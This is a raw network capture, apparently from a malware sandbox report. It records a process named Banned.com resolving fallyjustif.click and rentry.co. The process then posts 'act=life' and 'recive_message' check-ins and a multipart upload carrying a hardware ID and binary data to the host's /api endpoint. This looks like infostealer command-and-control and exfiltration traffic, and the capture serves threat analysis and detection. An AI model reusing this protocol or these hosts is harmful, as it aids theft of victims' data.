                                                                              Dec 28, 2024 21:36:13.809102058 CET44349779104.26.3.16192.168.2.4
                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Dec 28, 2024 21:35:05.242790937 CET5326853192.168.2.41.1.1.1
                                                                              Dec 28, 2024 21:35:05.458297968 CET53532681.1.1.1192.168.2.4
                                                                              Dec 28, 2024 21:35:51.340529919 CET5678453192.168.2.41.1.1.1
                                                                              Dec 28, 2024 21:35:51.663081884 CET53567841.1.1.1192.168.2.4
                                                                              Dec 28, 2024 21:36:11.596662045 CET5209453192.168.2.41.1.1.1
                                                                              Dec 28, 2024 21:36:11.815766096 CET53520941.1.1.1192.168.2.4
                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                              Dec 28, 2024 21:35:05.242790937 CET192.168.2.41.1.1.10xce49Standard query (0)xhWaXURTqNAudpSlyMZZXaDi.xhWaXURTqNAudpSlyMZZXaDiA (IP address)IN (0x0001)false
                                                                              Dec 28, 2024 21:35:51.340529919 CET192.168.2.41.1.1.10x77a8Standard query (0)fallyjustif.clickA (IP address)IN (0x0001)false
                                                                              Dec 28, 2024 21:36:11.596662045 CET192.168.2.41.1.1.10x91a8Standard query (0)rentry.coA (IP address)IN (0x0001)false
                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                              Dec 28, 2024 21:35:05.458297968 CET1.1.1.1192.168.2.40xce49Name error (3)xhWaXURTqNAudpSlyMZZXaDi.xhWaXURTqNAudpSlyMZZXaDinonenoneA (IP address)IN (0x0001)false
                                                                              Dec 28, 2024 21:35:51.663081884 CET1.1.1.1192.168.2.40x77a8No error (0)fallyjustif.click104.21.37.209A (IP address)IN (0x0001)false
                                                                              Dec 28, 2024 21:35:51.663081884 CET1.1.1.1192.168.2.40x77a8No error (0)fallyjustif.click172.67.213.115A (IP address)IN (0x0001)false
                                                                              Dec 28, 2024 21:36:11.815766096 CET1.1.1.1192.168.2.40x91a8No error (0)rentry.co104.26.3.16A (IP address)IN (0x0001)false
                                                                              Dec 28, 2024 21:36:11.815766096 CET1.1.1.1192.168.2.40x91a8No error (0)rentry.co104.26.2.16A (IP address)IN (0x0001)false
                                                                              Dec 28, 2024 21:36:11.815766096 CET1.1.1.1192.168.2.40x91a8No error (0)rentry.co172.67.75.40A (IP address)IN (0x0001)false
                                                                              • fallyjustif.click
                                                                              • rentry.co
                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              0192.168.2.449737104.21.37.2094437800C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-28 20:35:53 UTC264OUTPOST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 8
                                                                              Host: fallyjustif.click
                                                                              2024-12-28 20:35:53 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                              Data Ascii: act=life
                                                                              2024-12-28 20:35:53 UTC1137INHTTP/1.1 200 OK
                                                                              Date: Sat, 28 Dec 2024 20:35:53 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=rsfd17jdtnuc8e2r80f3andndj; expires=Wed, 23 Apr 2025 14:22:32 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              X-Frame-Options: DENY
                                                                              X-Content-Type-Options: nosniff
                                                                              X-XSS-Protection: 1; mode=block
                                                                              cf-cache-status: DYNAMIC
                                                                              vary: accept-encoding
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0Ku7%2FIU%2BIpSX1mRmYehXVmNlkbDn%2Bf%2FmsUAvH7%2BhP5wTKNUwLTx0wd5yxHwIXE2JS18TzG6KHhriRETz6X410UjMc6NPUmeK%2BxB81mkYdfJFUSqubJpj5WC8GbK%2F7H0l11ZiNw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8f9456e1ed588c72-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1879&min_rtt=1830&rtt_var=722&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2841&recv_bytes=908&delivery_rate=1595628&cwnd=174&unsent_bytes=0&cid=fc0871bdefe62bc0&ts=773&x=0"
                                                                              2024-12-28 20:35:53 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                              Data Ascii: 2ok
                                                                              2024-12-28 20:35:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              1192.168.2.449738104.21.37.2094437800C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-28 20:35:55 UTC265OUTPOST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 49
                                                                              Host: fallyjustif.click
                                                                              2024-12-28 20:35:55 UTC49OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4d 65 48 64 79 34 2d 2d 70 6c 31 6e 65 77 31 26 6a 3d
                                                                              Data Ascii: act=recive_message&ver=4.0&lid=MeHdy4--pl1new1&j=
                                                                              2024-12-28 20:35:55 UTC1133INHTTP/1.1 200 OK
                                                                              Date: Sat, 28 Dec 2024 20:35:55 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=765jdv9llvfk146h8q4dokcemk; expires=Wed, 23 Apr 2025 14:22:34 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              X-Frame-Options: DENY
                                                                              X-Content-Type-Options: nosniff
                                                                              X-XSS-Protection: 1; mode=block
                                                                              cf-cache-status: DYNAMIC
                                                                              vary: accept-encoding
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xWu5ne8J8BpbBrqL95OIS2jeoP7y%2BLvs3aEtbSXvkEm5p8%2BV7eeZS8LvCYWRT6lCJJD89hnb2i%2FxeabYQMdAaDisHoCd18EoS7esYBZswRF7PVspWB%2BhklFwJVnLr%2BKW62QxwA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8f9456ef295bc484-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1608&min_rtt=1603&rtt_var=612&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2842&recv_bytes=950&delivery_rate=1773997&cwnd=248&unsent_bytes=0&cid=a2034ba7577b5231&ts=798&x=0"
                                                                              2024-12-28 20:35:55 UTC236INData Raw: 34 36 37 0d 0a 49 67 43 6b 4d 74 62 79 32 65 70 59 4e 2f 42 41 56 34 73 38 48 61 4b 2f 59 6f 50 4d 77 70 31 32 30 6a 67 4a 31 56 6c 38 50 6c 4e 5a 49 74 49 51 37 4d 62 31 79 43 74 53 30 6e 6f 6a 2b 55 6c 34 6a 70 30 44 35 2b 37 34 2b 78 65 2b 53 32 7a 35 65 77 70 54 63 52 68 6d 78 56 36 6c 6c 2f 58 49 50 55 2f 53 65 67 7a 77 48 6e 6a 4d 6e 56 69 68 71 61 6a 2f 46 37 35 61 61 4c 34 32 44 46 49 77 53 6d 7a 44 57 72 4f 52 76 59 73 30 57 70 55 6c 4d 75 70 57 63 38 76 53 43 75 37 75 37 72 38 54 71 42 6f 7a 39 78 51 5a 53 6a 4a 76 59 64 64 5a 39 49 2f 31 6b 58 70 53 6e 6d 4a 74 71 56 31 34 77 4e 4d 45 35 36 65 71 39 52 36 32 57 32 32 2f 4b 52 56 59 4f 30 70 69 77 46 75 35 6d 4b 6d 47 50 6c 32 65 49 7a 6a
                                                                              Data Ascii: 467IgCkMtby2epYN/BAV4s8HaK/YoPMwp120jgJ1Vl8PlNZItIQ7Mb1yCtS0noj+Ul4jp0D5+74+xe+S2z5ewpTcRhmxV6ll/XIPU/SegzwHnjMnVihqaj/F75aaL42DFIwSmzDWrORvYs0WpUlMupWc8vSCu7u7r8TqBoz9xQZSjJvYddZ9I/1kXpSnmJtqV14wNME56eq9R62W22/KRVYO0piwFu5mKmGPl2eIzj
                                                                              2024-12-28 20:35:55 UTC898INData Raw: 71 48 6a 47 41 32 68 69 68 39 75 43 73 4a 72 4e 4c 65 71 49 32 44 6c 70 78 58 79 7a 66 45 4c 4f 63 2b 39 42 36 58 5a 34 73 4d 4f 70 52 65 4d 48 64 45 75 36 75 6f 2f 63 63 74 46 42 6b 75 44 51 51 56 6a 5a 49 61 38 46 66 73 35 69 39 68 7a 6b 56 33 47 49 79 38 52 34 6e 67 50 30 51 34 71 32 30 38 67 58 77 52 53 57 75 65 78 6c 51 63 52 67 69 77 46 36 31 6e 62 75 61 4d 6c 36 5a 4a 79 66 69 56 33 4c 4e 33 51 33 72 6f 61 50 2f 45 37 70 51 5a 4c 30 2f 45 31 45 33 51 47 4b 47 48 76 53 58 6f 38 68 69 46 62 45 6e 4a 65 35 53 61 59 4c 6e 51 50 37 67 75 62 38 54 76 42 6f 7a 39 7a 4d 62 58 7a 4a 4c 62 63 56 59 76 34 4b 37 6d 6a 78 59 6c 7a 41 7a 37 46 42 31 77 38 38 4b 37 36 69 6a 39 68 2b 35 58 32 79 7a 65 31 41 63 4e 6c 67 69 6e 68 43 56 6e 62 43 45 4d 45 4b 53 59 69
                                                                              Data Ascii: qHjGA2hih9uCsJrNLeqI2DlpxXyzfELOc+9B6XZ4sMOpReMHdEu6uo/cctFBkuDQQVjZIa8Ffs5i9hzkV3GIy8R4ngP0Q4q208gXwRSWuexlQcRgiwF61nbuaMl6ZJyfiV3LN3Q3roaP/E7pQZL0/E1E3QGKGHvSXo8hiFbEnJe5SaYLnQP7gub8TvBoz9zMbXzJLbcVYv4K7mjxYlzAz7FB1w88K76ij9h+5X2yze1AcNlginhCVnbCEMEKSYi
                                                                              2024-12-28 20:35:55 UTC1369INData Raw: 34 35 32 64 0d 0a 35 61 33 7a 4f 30 77 66 33 37 72 2b 78 44 66 42 64 5a 2f 64 6a 58 6c 4d 2b 54 32 72 47 55 62 43 64 76 34 6b 33 57 5a 73 68 4f 65 56 57 63 73 7a 5a 44 2b 6d 6d 6f 2f 63 47 76 6c 52 74 73 54 73 62 48 48 38 41 5a 64 34 51 37 4e 43 66 68 69 31 42 6d 57 41 41 36 6c 42 78 78 38 74 41 2f 75 43 35 76 78 4f 38 47 6a 50 33 4e 52 4e 58 50 55 64 72 78 31 4f 30 6d 72 57 48 4d 46 32 61 49 6a 6a 6f 56 58 66 47 30 41 76 75 6f 61 66 33 46 37 78 66 5a 72 52 37 55 42 77 32 57 43 4b 65 45 4a 47 65 75 4a 6b 72 46 36 63 68 4f 2b 64 5a 61 59 44 43 54 76 6a 75 70 2f 4e 55 36 42 70 68 73 44 77 61 55 54 74 44 5a 73 4a 64 75 35 6d 79 67 53 68 66 6e 69 77 6e 35 46 52 36 7a 74 45 46 37 71 36 68 2f 68 71 36 55 53 76 35 65 78 6c 45 63 52 67 69 36 56 32 6b 67 72 47 44
                                                                              Data Ascii: 452d5a3zO0wf37r+xDfBdZ/djXlM+T2rGUbCdv4k3WZshOeVWcszZD+mmo/cGvlRtsTsbHH8AZd4Q7NCfhi1BmWAA6lBxx8tA/uC5vxO8GjP3NRNXPUdrx1O0mrWHMF2aIjjoVXfG0Avuoaf3F7xfZrR7UBw2WCKeEJGeuJkrF6chO+dZaYDCTvjup/NU6BphsDwaUTtDZsJdu5mygShfniwn5FR6ztEF7q6h/hq6USv5exlEcRgi6V2kgrGD
                                                                              2024-12-28 20:35:55 UTC1369INData Raw: 49 79 38 52 34 6e 67 50 49 44 39 36 54 67 34 46 71 70 47 6d 79 37 65 30 59 63 4f 30 78 6d 78 56 79 39 6e 4c 61 4a 50 6c 4b 66 4a 6a 58 76 57 48 72 42 31 67 6a 74 6f 61 72 7a 45 4c 78 54 62 62 73 34 48 56 70 78 44 69 4c 42 53 50 54 49 2b 36 6b 33 58 70 34 69 4e 76 68 5a 50 34 36 64 44 75 65 75 34 4b 63 43 6f 45 31 73 71 48 55 48 48 44 5a 4d 49 70 34 51 76 6f 4b 2b 68 6a 35 66 6c 79 59 35 34 31 35 36 30 74 55 47 35 71 4b 6f 2b 68 75 32 58 32 61 77 4d 42 31 4f 49 30 4e 6d 79 46 7a 30 33 76 75 50 49 68 58 4b 59 68 44 2b 58 57 2f 47 33 6b 44 2b 34 4c 6d 2f 45 37 77 61 4d 2f 63 37 45 46 41 36 52 32 6e 4e 56 4c 43 51 74 6f 4d 30 57 35 73 75 50 65 56 5a 62 63 33 59 43 4f 75 6e 70 66 4d 5a 73 30 68 6f 74 6e 74 51 48 44 5a 59 49 70 34 51 6b 36 4f 4d 71 33 70 4b 33
                                                                              Data Ascii: Iy8R4ngPID96Tg4FqpGmy7e0YcO0xmxVy9nLaJPlKfJjXvWHrB1gjtoarzELxTbbs4HVpxDiLBSPTI+6k3Xp4iNvhZP46dDueu4KcCoE1sqHUHHDZMIp4QvoK+hj5flyY541560tUG5qKo+hu2X2awMB1OI0NmyFz03vuPIhXKYhD+XW/G3kD+4Lm/E7waM/c7EFA6R2nNVLCQtoM0W5suPeVZbc3YCOunpfMZs0hotntQHDZYIp4Qk6OMq3pK3
                                                                              2024-12-28 20:35:55 UTC1369INData Raw: 47 50 35 69 64 4c 4f 4b 68 71 37 38 4c 2f 6b 4d 72 73 44 64 65 42 48 46 48 61 73 35 65 74 35 61 77 68 44 5a 55 6d 79 51 77 34 56 6c 77 78 39 51 48 34 61 69 79 2b 42 6d 35 57 6d 43 2b 4d 52 70 64 4f 67 41 73 68 6c 65 73 30 4f 50 49 43 46 4b 45 4d 6a 61 70 51 54 48 5a 6e 51 66 74 37 76 69 2f 47 61 4a 62 62 71 55 2f 45 56 63 6a 53 32 54 47 56 61 61 58 74 34 49 31 56 70 6f 76 4e 75 46 4d 66 38 33 64 45 76 4f 6f 71 2f 46 55 2f 68 70 73 72 33 74 47 48 41 42 58 61 59 5a 50 2b 6f 6e 37 6a 7a 59 56 79 6d 49 32 34 31 4e 78 30 74 6b 47 36 71 32 75 39 78 47 34 58 6d 47 36 4e 42 56 57 4f 45 68 69 79 56 57 38 6d 37 32 47 4f 31 4f 65 4c 33 57 6e 48 6e 6a 59 6e 56 69 68 69 62 72 79 45 71 64 4c 58 72 41 37 54 78 77 75 44 6e 75 47 56 37 6a 51 34 38 67 33 57 5a 67 76 4d 4f
                                                                              Data Ascii: GP5idLOKhq78L/kMrsDdeBHFHas5et5awhDZUmyQw4Vlwx9QH4aiy+Bm5WmC+MRpdOgAshles0OPICFKEMjapQTHZnQft7vi/GaJbbqU/EVcjS2TGVaaXt4I1VpovNuFMf83dEvOoq/FU/hpsr3tGHABXaYZP+on7jzYVymI241Nx0tkG6q2u9xG4XmG6NBVWOEhiyVW8m72GO1OeL3WnHnjYnVihibryEqdLXrA7TxwuDnuGV7jQ48g3WZgvMO
                                                                              2024-12-28 20:35:55 UTC1369INData Raw: 77 6b 37 34 37 71 66 7a 56 4f 67 61 5a 62 6f 39 48 31 30 35 53 47 4c 41 57 72 43 54 73 6f 73 39 58 4a 51 70 4e 75 4e 52 65 4d 62 5a 41 4f 71 70 72 76 6b 52 75 31 4d 72 2b 58 73 5a 52 48 45 59 49 75 42 7a 70 6f 4b 4a 68 6a 6c 4f 30 6a 31 37 38 42 35 34 7a 4a 31 59 6f 61 57 6f 38 41 61 31 55 32 4f 7a 4d 68 35 59 4f 30 31 6c 78 6c 57 35 6c 62 2b 47 50 6c 4b 53 4c 6a 72 75 56 6e 44 45 33 51 2b 68 34 4f 44 34 44 50 41 43 4b 35 63 77 43 48 30 2f 53 33 43 47 54 2f 71 4a 2b 34 38 32 46 63 70 69 4f 2b 42 66 64 38 37 52 43 4f 57 38 6f 50 51 64 76 31 74 6b 74 7a 67 66 56 6a 6c 53 5a 4d 5a 62 76 4a 65 7a 6a 44 52 48 6b 79 31 31 70 78 35 34 32 4a 31 59 6f 5a 2b 32 2b 42 4f 2f 47 45 4b 77 49 42 39 57 4d 6b 74 75 68 6b 2f 36 69 66 75 50 4e 68 58 4b 59 6a 6a 6c 55 33 76
                                                                              Data Ascii: wk747qfzVOgaZbo9H105SGLAWrCTsos9XJQpNuNReMbZAOqprvkRu1Mr+XsZRHEYIuBzpoKJhjlO0j178B54zJ1YoaWo8Aa1U2OzMh5YO01lxlW5lb+GPlKSLjruVnDE3Q+h4OD4DPACK5cwCH0/S3CGT/qJ+482FcpiO+Bfd87RCOW8oPQdv1tktzgfVjlSZMZbvJezjDRHky11px542J1YoZ+2+BO/GEKwIB9WMktuhk/6ifuPNhXKYjjlU3v
                                                                              2024-12-28 20:35:55 UTC1369INData Raw: 71 4c 67 70 31 53 37 56 47 36 32 4e 78 52 62 50 31 4a 6a 7a 46 79 31 6c 37 79 44 4b 46 36 41 4b 54 33 71 55 48 66 4a 33 51 37 68 72 36 33 2f 56 50 34 61 62 4b 39 37 52 68 77 55 59 33 58 51 57 76 61 7a 72 4a 34 77 55 70 34 30 50 75 68 64 61 63 33 4e 51 4b 2f 75 73 66 67 46 38 41 4a 39 70 79 77 5a 51 33 39 5a 49 73 46 63 39 4d 6a 37 67 7a 56 62 6e 79 6b 78 34 46 74 33 77 39 67 46 36 36 4b 73 2f 68 79 35 55 47 36 79 50 52 52 66 50 30 39 6a 79 6c 53 39 6e 72 4c 49 64 42 57 56 4f 6e 57 78 48 6b 6e 51 32 68 6a 73 76 75 4c 4e 46 36 46 4c 66 72 6f 72 47 42 34 65 51 32 37 46 56 62 4f 41 2b 35 64 30 54 4e 49 6c 4f 61 6b 47 50 38 44 5a 44 4f 4b 70 72 76 41 5a 76 31 31 67 75 44 45 51 54 6a 35 46 61 73 70 59 75 59 4b 78 67 69 68 63 6d 79 38 37 34 55 78 38 67 4a 4e 41
                                                                              Data Ascii: qLgp1S7VG62NxRbP1JjzFy1l7yDKF6AKT3qUHfJ3Q7hr63/VP4abK97RhwUY3XQWvazrJ4wUp40Puhdac3NQK/usfgF8AJ9pywZQ39ZIsFc9Mj7gzVbnykx4Ft3w9gF66Ks/hy5UG6yPRRfP09jylS9nrLIdBWVOnWxHknQ2hjsvuLNF6FLfrorGB4eQ27FVbOA+5d0TNIlOakGP8DZDOKprvAZv11guDEQTj5FaspYuYKxgihcmy874Ux8gJNA
                                                                              2024-12-28 20:35:55 UTC1369INData Raw: 39 4d 69 52 6f 6a 39 77 52 51 48 43 6b 41 4f 6f 5a 6c 74 35 36 31 6a 79 78 45 33 77 4d 34 34 6c 4a 79 7a 39 5a 41 72 2b 36 6d 76 30 7a 67 46 43 75 7a 4b 6c 34 45 59 52 49 35 6b 77 50 6a 77 4f 6d 58 64 45 7a 53 4e 48 57 78 44 44 47 41 7a 30 43 35 37 75 66 38 42 71 4a 63 61 4b 45 34 57 57 49 50 59 33 58 51 57 71 2f 53 6e 59 38 72 58 49 51 76 4a 39 64 67 55 63 33 63 41 2b 2f 73 6b 65 6b 5a 6f 46 6c 75 73 41 55 67 55 6a 5a 55 5a 63 68 57 74 4e 44 31 79 44 55 56 79 68 74 31 6f 52 35 41 6a 70 30 59 6f 66 62 67 79 68 65 2b 56 47 79 68 4b 6c 4e 2f 4a 6c 5a 6f 33 52 4b 53 6c 36 71 42 4c 46 69 41 59 6e 75 70 57 44 2b 59 6a 55 36 68 71 72 47 2f 54 4f 41 49 4d 4f 4a 6f 53 51 78 6a 58 79 7a 66 45 4b 4c 51 34 39 70 30 46 59 42 69 62 61 6b 5a 66 4e 4c 50 42 75 4b 34 6f
                                                                              Data Ascii: 9MiRoj9wRQHCkAOoZlt561jyxE3wM44lJyz9ZAr+6mv0zgFCuzKl4EYRI5kwPjwOmXdEzSNHWxDDGAz0C57uf8BqJcaKE4WWIPY3XQWq/SnY8rXIQvJ9dgUc3cA+/skekZoFlusAUgUjZUZchWtND1yDUVyht1oR5Ajp0Yofbgyhe+VGyhKlN/JlZo3RKSl6qBLFiAYnupWD+YjU6hqrG/TOAIMOJoSQxjXyzfEKLQ49p0FYBibakZfNLPBuK4o
                                                                              2024-12-28 20:35:55 UTC1369INData Raw: 61 62 36 5a 37 52 67 78 6a 47 7a 65 56 42 2b 54 43 70 4d 59 6a 46 59 52 69 62 62 73 51 50 39 4b 64 57 4b 48 70 6f 2b 30 47 74 6c 6c 39 74 48 77 67 59 67 52 44 62 4d 68 58 6f 71 57 34 6d 54 6c 56 6d 52 77 4c 79 46 42 30 78 39 45 57 33 35 43 56 2f 42 71 2b 58 58 32 6d 65 31 41 63 50 67 41 36 2f 78 44 38 30 49 54 47 65 6b 33 53 65 6e 58 63 58 58 48 4f 32 68 62 77 34 35 58 38 42 62 4e 61 59 50 64 31 58 6c 70 78 47 44 43 49 45 4c 43 42 2b 39 42 71 42 38 6c 33 5a 72 34 4f 4c 64 2b 54 47 61 47 34 34 4b 64 47 2f 68 70 35 39 32 4e 65 47 7a 4a 53 63 4d 42 54 6f 70 50 38 74 67 52 7a 6b 53 55 7a 36 6c 42 6f 30 5a 38 76 34 71 57 73 38 78 4f 6d 5a 46 57 69 4f 42 42 53 4e 6c 5a 7a 68 68 37 30 6e 2f 76 51 41 78 57 44 4b 44 4b 6c 46 6a 50 52 7a 67 37 71 75 4b 65 2f 4b 2f
                                                                              Data Ascii: ab6Z7RgxjGzeVB+TCpMYjFYRibbsQP9KdWKHpo+0Gtll9tHwgYgRDbMhXoqW4mTlVmRwLyFB0x9EW35CV/Bq+XX2me1AcPgA6/xD80ITGek3SenXcXXHO2hbw45X8BbNaYPd1XlpxGDCIELCB+9BqB8l3Zr4OLd+TGaG44KdG/hp592NeGzJScMBTopP8tgRzkSUz6lBo0Z8v4qWs8xOmZFWiOBBSNlZzhh70n/vQAxWDKDKlFjPRzg7quKe/K/


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              2192.168.2.449740104.21.37.2094437800C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-28 20:35:57 UTC275OUTPOST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: multipart/form-data; boundary=AQ4D61LZJF
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 18117
                                                                              Host: fallyjustif.click
                                                                              2024-12-28 20:35:57 UTC15331OUTData Raw: 2d 2d 41 51 34 44 36 31 4c 5a 4a 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 43 33 32 45 33 46 45 38 36 44 42 45 30 41 33 31 34 34 31 45 44 44 38 45 30 35 43 45 33 44 41 0d 0a 2d 2d 41 51 34 44 36 31 4c 5a 4a 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 41 51 34 44 36 31 4c 5a 4a 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 65 48 64 79 34 2d 2d 70 6c 31 6e 65 77 31 0d 0a 2d 2d 41 51 34 44 36 31 4c 5a 4a 46 0d 0a 43 6f 6e 74 65 6e
                                                                              Data Ascii: --AQ4D61LZJFContent-Disposition: form-data; name="hwid"FC32E3FE86DBE0A31441EDD8E05CE3DA--AQ4D61LZJFContent-Disposition: form-data; name="pid"2--AQ4D61LZJFContent-Disposition: form-data; name="lid"MeHdy4--pl1new1--AQ4D61LZJFConten
                                                                              2024-12-28 20:35:57 UTC2786OUTData Raw: 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 94 6d 93 be 93 15 d7 52 9c ab a6
                                                                              Data Ascii: .\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTwmR
                                                                              2024-12-28 20:35:58 UTC1141INHTTP/1.1 200 OK
                                                                              Date: Sat, 28 Dec 2024 20:35:58 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=fdjvgpbj3d7ll8kbhraj1bqtn6; expires=Wed, 23 Apr 2025 14:22:37 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              X-Frame-Options: DENY
                                                                              X-Content-Type-Options: nosniff
                                                                              X-XSS-Protection: 1; mode=block
                                                                              cf-cache-status: DYNAMIC
                                                                              vary: accept-encoding
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cw8BkG0nU%2BtbJi4Rs928lNZE%2B0%2FuBChKAy8n2mfHZWA6E2fweECm8fiDM1tEacTpyqzxucsvf6%2Fw%2FGjvxmiChuskF1X3NXgnu6JUfs9SLEDGNxyPF5pt%2FNDgKjgOMsV%2FMazJjA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8f9456fef8517c88-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1825&min_rtt=1821&rtt_var=691&sent=10&recv=23&lost=0&retrans=0&sent_bytes=2840&recv_bytes=19072&delivery_rate=1574123&cwnd=219&unsent_bytes=0&cid=6b3eca48bb8eef7f&ts=985&x=0"
                                                                              2024-12-28 20:35:58 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                              Data Ascii: fok 8.46.123.189
                                                                              2024-12-28 20:35:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              3192.168.2.449747104.21.37.2094437800C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-12-28 20:36:00 UTC276OUTPOST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: multipart/form-data; boundary=WUB58VWQQVKX
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 8750
                                                                              Host: fallyjustif.click
